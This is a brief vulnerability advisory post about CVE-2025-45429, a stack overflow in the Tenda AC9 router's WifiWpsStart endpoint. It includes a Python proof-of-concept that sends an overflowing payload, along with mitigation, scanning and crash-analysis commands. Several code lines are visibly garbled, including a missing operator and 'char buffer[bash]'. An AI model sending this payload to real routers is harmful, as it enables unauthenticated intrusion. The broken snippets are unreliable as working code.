Tenda AC9 Router, Stack Overflow, CVE-2025-45429 (Critical)

How the CVE Works:

The CVE-2025-45429 vulnerability exists in Tenda AC9 routers (v1.0) running firmware V15.03.05.14_multi. The stack overflow occurs in the `/goform/WifiWpsStart` endpoint when processing overly long input strings. Attackers can craft malicious HTTP POST requests with oversized parameters that exceed the buffer capacity, overwriting adjacent memory regions. This allows remote code execution by carefully manipulating the return address or function pointers on the stack. The vulnerability doesn’t require authentication, making it particularly dangerous as it can be exploited from the WAN interface.

DailyCVE Form:

Platform: Tenda AC9 Router
Version: V15.03.05.14_multi
Vulnerability: Stack Overflow
Severity: Critical
Date: 04/23/2025

What Undercode Say:

Exploit PoC (for educational purposes only)
import requests
target = "http://192.168.0.1/goform/WifiWpsStart"
payload = "A" 1024 + "\xde\xad\xbe\xef" Overflow buffer + controlled EIP
response = requests.post(target, data={"wps_enable": payload})
print(response.status_code)

Protection commands:

Temporary mitigation (block access to vulnerable endpoint)
iptables -A INPUT -p tcp --dport 80 -m string --string "/goform/WifiWpsStart" --algo bm -j DROP
Firmware update check
curl -s http://www.tendacn.com/en/security/ | grep AC9

Memory analysis commands:

Crash analysis on router
gdb -q /usr/bin/httpd core.dump
info registers
x/20x $sp

Vulnerable code pattern:

// Vulnerable function example
void handleWpsStart() {
char buffer[bash]; // Fixed-size buffer
strcpy(buffer, get_param("wps_enable")); // Unsafe copy
}

Patch verification:

Check patched version
strings /usr/bin/httpd | grep "15.03.05.15"
md5sum /usr/bin/httpd

Network detection:

Identify vulnerable devices
nmap -p80 --script http- -sV 192.168.0.0/24 | grep "Tenda AC9"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top